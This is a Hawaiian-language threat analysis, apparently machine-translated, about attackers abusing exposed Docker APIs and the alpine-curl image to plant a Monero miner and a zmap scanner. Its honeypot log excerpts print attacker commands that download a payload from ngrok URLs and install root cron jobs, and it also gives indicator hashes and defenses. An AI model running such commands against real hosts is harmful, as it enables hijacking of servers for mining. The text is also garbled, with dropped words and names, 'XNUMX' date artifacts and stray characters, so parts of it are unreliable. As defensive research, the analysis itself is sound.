Hoʻopili mākou i ka ʻikepili i hōʻiliʻili ʻia me ka hoʻohana ʻana i nā ipu honeypot, a mākou i hana ai e hahai i nā hoʻoweliweli. A ua ʻike mākou i nā hana koʻikoʻi mai nā miners cryptocurrency makemake ʻole a ʻae ʻole ʻia i hoʻonohonoho ʻia ma ke ʻano he mau pahu rogue e hoʻohana ana i kahi kiʻi i paʻi ʻia e ke kaiāulu ma Docker Hub. Hoʻohana ʻia ke kiʻi ma ke ʻano he ʻāpana o ka lawelawe e hāʻawi ana i nā miners cryptocurrency maikaʻi ʻole.
Hoʻohui ʻia, ua hoʻokomo ʻia nā papahana no ka hana ʻana me nā pūnaewele e komo i nā ipu a me nā noi e wehe ʻia ana.
Ke waiho nei mākou i kā mākou mau honeypots e like me ia, ʻo ia hoʻi, me nā hoʻonohonoho paʻamau, me ka ʻole o nā ana palekana a i ʻole ka hoʻokomo ʻana i nā polokalamu hou. E ʻoluʻolu e loaʻa iā Docker nā ʻōlelo aʻoaʻo no ka hoʻonohonoho mua e pale aku i nā hewa a me nā nāwaliwali maʻalahi. Akā ʻo nā pahu meli i hoʻohana ʻia he mau ipu, i hoʻolālā ʻia e ʻike i nā hoʻouka ʻana e pili ana i ka paepae containerization, ʻaʻole nā noi i loko o nā ipu.
ʻIke ʻia ka hana ʻino i ʻike ʻia no ka mea ʻaʻole ia e koi i nā nāwaliwali a kūʻokoʻa hoʻi i ka mana Docker. ʻO ka loaʻa ʻana o kahi kiʻi i hoʻonohonoho hewa ʻole ʻia, a no laila wehe ʻia, ʻo ke kiʻi pahu wale nō ka mea e pono ai ka poʻe hoʻouka e hoʻopilikia i nā kikowaena wehe.
ʻO ka Docker API i wehe ʻole ʻia e hiki i ka mea hoʻohana ke hana i kahi ākea ākea , me ka loaʻa ʻana o ka papa inoa o nā ipu e holo ana, ka loaʻa ʻana o nā lāʻau mai kahi pahu kikoʻī, hoʻomaka, hoʻomaha (me ka hoʻoikaika ʻia) a me ka hana ʻana i kahi pahu hou mai kahi kiʻi kikoʻī me nā hoʻonohonoho kikoʻī.
Aia ma ka ʻaoʻao hema ke ʻano hoʻopuka malware. Aia ma ka ʻaoʻao ʻākau ke kaiapuni o ka mea hoʻouka, kahi e ʻae ai i ka ʻōwili mamao ʻana i waho o nā kiʻi.
Hāʻawi ʻia e ka ʻāina o 3762 open Docker API. Ma muli o ka huli ʻana ʻo Shodan i hoʻopaʻa ʻia ma 12.02.2019/XNUMX/XNUMX
ʻO ke kaulahao hoʻouka a me nā koho uku
ʻAʻole ʻike wale ʻia ka hana ʻino me ke kōkua o nā honeypots. Hōʻike ka ʻikepili mai Shodan i ka nui o nā Docker API i hōʻike ʻia (e ʻike i ka pakuhi ʻelua) mai ka wā i noiʻi ai mākou i kahi pahu kuhi hewa i hoʻohana ʻia ma ke alahaka no ka hoʻokomo ʻana i ka polokalamu mining cryptocurrency Monero. I ʻOkakopa i ka makahiki i hala (2018, nā ʻikepili o kēia manawa kokoke. mea unuhi) he 856 wale nō nā API hāmama.
Ua hōʻike ʻia ka nānā ʻana i nā lāʻau honeypot e pili pū ana ka hoʻohana ʻana i ke kiʻi pahu me ka hoʻohana ʻana , he mea hana no ka hoʻokumu ʻana i nā pilina paʻa a i ʻole ka hoʻouna ʻana i nā kaʻa mai nā wahi i hiki ke ʻike ʻia e ka lehulehu i nā helu wahi a i ʻole nā kumuwaiwai i kuhikuhi ʻia (no ka laʻana localhost). Hāʻawi kēia i ka poʻe hoʻouka e hana ikaika i nā URL i ka wā e hāʻawi ana i ka uku uku i kahi kikowaena wehe. Aia ma lalo nā hiʻohiʻona code mai nā lāʻau e hōʻike ana i ka hoʻomāinoino i ka lawelawe ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”E like me kāu e ʻike ai, hoʻoiho ʻia nā faila i hoʻoiho ʻia mai ka hoʻololi mau ʻana i nā URL. He lā pōkole kēia mau URL, no laila ʻaʻole hiki ke hoʻoiho ʻia nā uku uku ma hope o ka lā pau.
ʻElua mau koho uku. ʻO ka mea mua he miner ELF i hui pū ʻia no Linux (i wehewehe ʻia ʻo Coinminer.SH.MALXMR.ATNO) e pili ana i ka wai mining. ʻO ka lua he palapala (TrojanSpy.SH.ZNETMAP.A) i hoʻolālā ʻia no ka loaʻa ʻana o kekahi mau hāmeʻa pūnaewele i hoʻohana ʻia e nānā i nā pae pūnaewele a laila e ʻimi i nā pahuhopu hou.
Hoʻonohonoho ka ʻatikala dropper i ʻelua mau mea hoʻololi, a laila hoʻohana ʻia e kau i ka miner cryptocurrency. Aia i loko o ka hoʻololi HOST ka URL kahi i loaʻa ai nā faila hewa, a ʻo ka RIP variable ka inoa faila (ʻoiaʻiʻo, ka hash) o ka mea miner e kau ʻia. Hoʻololi ka hoʻololi HOST i kēlā me kēia manawa e hoʻololi ka hoʻololi hash. Ke ho'āʻo nei hoʻi ka ʻatikala e nānā ʻaʻole e holo ana nā miners cryptocurrency ʻē aʻe ma ke kikowaena hoʻouka ʻia.
Nā hiʻohiʻona o HOST a me RIP mau mea hoʻololi, a me kahi snippet code i hoʻohana ʻia e nānā ʻaʻole e holo ana nā miners ʻē aʻe.
Ma mua o ka hoʻomaka ʻana i ka miner, ua kapa ʻia ʻo ia i ka nginx. Hoʻololi hou nā mana ʻē aʻe o kēia palapala i ka mea miner i nā lawelawe kūpono ʻē aʻe i loaʻa i nā kaiapuni Linux. He mea maʻamau kēia no ka pale ʻana i nā hōʻoia i ka papa inoa o nā kaʻina holo.
Loaʻa nā hiʻohiʻona o ka palapala hulina. Hana ia me ka lawelawe URL like e kau i nā mea pono. Aia ma waena o lākou ka zmap binary, i hoʻohana ʻia e nānā i nā pūnaewele a loaʻa i kahi papa inoa o nā awa wehe. Hoʻokomo pū ka palapala i kahi binary ʻē aʻe i hoʻohana ʻia e launa pū me nā lawelawe i loaʻa a loaʻa i nā hae mai iā lākou e hoʻoholo ai i nā ʻike hou aʻe e pili ana i ka lawelawe i loaʻa (no ka laʻana, kona mana).
Hoʻoholo mua ka palapala i kekahi mau pae pūnaewele e nānā, akā pili kēia i ka mana o ka palapala. Hoʻonohonoho pū ia i nā awa i hoʻopaʻa ʻia mai nā lawelawe-i kēia hihia, Docker-ma mua o ka holo ʻana i ka scan.
I ka wā e ʻike ʻia ai nā pahu hopu, wehe ʻia nā hae. Hoʻopili ka palapala i nā pahuhopu e pili ana i nā lawelawe, nā noi, nā ʻāpana a i ʻole nā pahu hoihoi: Redis, Jenkins, Drupal, MODX, , Docker 1.16 mea kūʻai aku a me Apache CouchDB. Inā pili ka server scanned i kekahi o lākou, mālama ʻia ia i kahi faila kikokikona, hiki i nā mea hoʻouka ke hoʻohana ma hope no ka nānā ʻana a me ka hacking. Hoʻouka ʻia kēia mau faila kikokikona i nā kikowaena o nā mea hoʻouka ma o nā loulou dynamic. ʻO ia hoʻi, hoʻohana ʻia kahi URL kaʻawale no kēlā me kēia faila, ʻo ia hoʻi he paʻakikī ke komo ʻana ma hope.
ʻO ka mea hoʻouka kaua he kiʻi Docker, e like me ka mea i ʻike ʻia ma nā ʻāpana code ʻelua e hiki mai ana.
Aia ma luna ke kapa hou ʻana i kahi lawelawe kūpono, a ma lalo ke ʻano o ka hoʻohana ʻana o zmap e nānā i nā pūnaewele.
Aia ma luna nā pae pūnaewele i koho mua ʻia, ma lalo nā awa kikoʻī no ka ʻimi ʻana i nā lawelawe, me Docker.
Hōʻike ka kiʻi kiʻi ua hoʻoiho ʻia ke kiʻi alpine-curl ma mua o 10 miliona mau manawa
Hoʻokumu ʻia ma Alpine Linux a me curl, kahi hāmeʻa CLI kūpono no ka hoʻoili ʻana i nā faila ma luna o nā protocol like ʻole, hiki iā ʻoe ke kūkulu. . E like me kāu e ʻike ai ma ke kiʻi mua, ua hoʻoiho ʻia kēia kiʻi ma mua o 10 miliona mau manawa. ʻO ka nui o nā hoʻoiho ʻana paha ke hoʻohana ʻana i kēia kiʻi ma ke ʻano he helu komo; ua hōʻano hou ʻia kēia kiʻi ma mua o ʻeono mahina aku nei; ʻaʻole i hoʻoiho pinepine nā mea hoʻohana i nā kiʻi ʻē aʻe mai kēia waihona. Ma Docker - he pūʻulu kuhikuhi i hoʻohana ʻia no ka hoʻonohonoho ʻana i kahi pahu e holo ai. Inā ʻaʻole pololei ka hoʻonohonoho ʻana i nā helu komo (e like me ka laʻana, waiho ʻia ka pahu mai ka Pūnaewele), hiki ke hoʻohana ʻia ke kiʻi ma ke ʻano he mea hoʻouka kaua. Hiki i nā mea hoʻouka ke hoʻohana iā ia no ka hāʻawi ʻana i kahi uku inā ʻike lākou i kahi pahu kuhi hewa ʻole a wehe ʻole ʻia.
He mea nui e hoʻomaopopo i kēia kiʻi (alpine-curl) ponoʻī ʻaʻole hewa, akā e like me kāu e ʻike ai ma luna, hiki ke hoʻohana ʻia e hana i nā hana ʻino. Hiki ke hoʻohana ʻia nā kiʻi Docker like e hana i nā hana ʻino. Hoʻopili mākou iā Docker a hana pū me lākou ma kēia pilikia.
koi
koe no nā ʻoihana he nui, ʻoi aku ka poʻe e hoʻokō nei , e kālele ana i ka hoʻomohala wikiwiki a me ka lawe ʻana. Hoʻonui ʻia nā mea a pau e ka pono e hoʻokō i nā lula loiloi a me ka nānā ʻana, ka pono e nānā i ka hūnā ʻikepili, a me ka pōʻino nui o kā lākou hoʻokō ʻole. ʻO ka hoʻokomo ʻana i ka automation palekana i loko o ke ola ola hoʻomohala ʻaʻole wale e kōkua iā ʻoe e ʻimi i nā lua palekana i ʻike ʻole ʻia, akā kōkua pū kekahi iā ʻoe e hōʻemi i ka hana pono ʻole, e like me ka holo ʻana i nā lako polokalamu hou no kēlā me kēia nāwaliwali i ʻike ʻia a i ʻole ka hoʻonohonoho hewa ʻana ma hope o ke kau ʻia ʻana o kahi noi.
ʻO ka hanana i kūkākūkā ʻia ma kēia ʻatikala e hōʻike ana i ka pono e mālama i ka palekana mai ka hoʻomaka ʻana, me nā ʻōlelo aʻe:
- No nā luna hoʻonohonoho a me nā mea hoʻomohala: E nānā mau i kāu mau hoʻonohonoho API e hōʻoia i ka hoʻonohonoho ʻana i nā mea āpau e ʻae wale i nā noi mai kahi kikowaena kikoʻī a i ʻole pūnaewele kūloko.
- E hahai i ke kumu o nā kuleana liʻiliʻi: e hōʻoia i ka hoʻopaʻa ʻia a hōʻoia ʻia nā kiʻi pahu, e kaupalena i ke komo ʻana i nā mea koʻikoʻi (lawelawe pahu pahu) a hoʻohui i ka hoʻopili ʻana i nā pilina pūnaewele.
- Hahai a hiki i nā mīkini palekana, e.g. a i kūkulu ʻia i loko .
- E hoʻohana i ka nānā ʻana i nā manawa holo a me nā kiʻi no ka loaʻa ʻana o ka ʻike hou e pili ana i nā kaʻina hana e holo ana i loko o ka ipu (e laʻana, e ʻike i ka spoofing a i ʻole e ʻimi i nā mea nāwaliwali). ʻO ka mana noi a me ka nānā pono ʻana e kōkua i ka nānā ʻana i nā loli like ʻole i nā kikowaena, nā faila, a me nā wahi ʻōnaehana.
Kōkua ʻo Trendmicro i nā hui DevOps e kūkulu paʻa, e holo wikiwiki a hoʻomaka i nā wahi āpau. ʻAno Micro Hāʻawi i ka palekana ikaika, streamline, a me ka automated ma waena o ka pipeline DevOps o kahi hui a hāʻawi i nā pale hoʻoweliweli lehulehu. no ka pale ʻana i nā hana kino, virtual a me ke ao i ka wā holo. Hoʻohui ia i ka palekana pahu me и , nāna e nānā i nā kiʻi pahu Docker no ka malware a me nā nāwaliwali i kēlā me kēia manawa i ka pipeline hoʻomohala e pale aku i nā hoʻoweliweli ma mua o ka hoʻoili ʻia ʻana.
Nā hōʻailona o ke kuʻikahi
Hashes pili:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
maluna o Hōʻike ka poʻe hoʻomaʻamaʻa haʻiʻōlelo i nā hoʻonohonoho pono e hana mua ʻia i mea e hōʻemi ai i ka likelike a i ʻole e pale loa i ke ʻano o ke kūlana i hōʻike ʻia ma luna. A ma ʻAukake 19-21 ma kahi kikowaena pūnaewele Hiki iā ʻoe ke kūkākūkā i kēia a me nā pilikia palekana like me nā hoahana a me nā kumu hoʻomaʻamaʻa ma kahi papaʻaina, kahi e hiki ai i nā mea a pau ke ʻōlelo a hoʻolohe i nā ʻeha a me nā kūleʻa o nā hoa hana ʻike.
Source: www.habr.com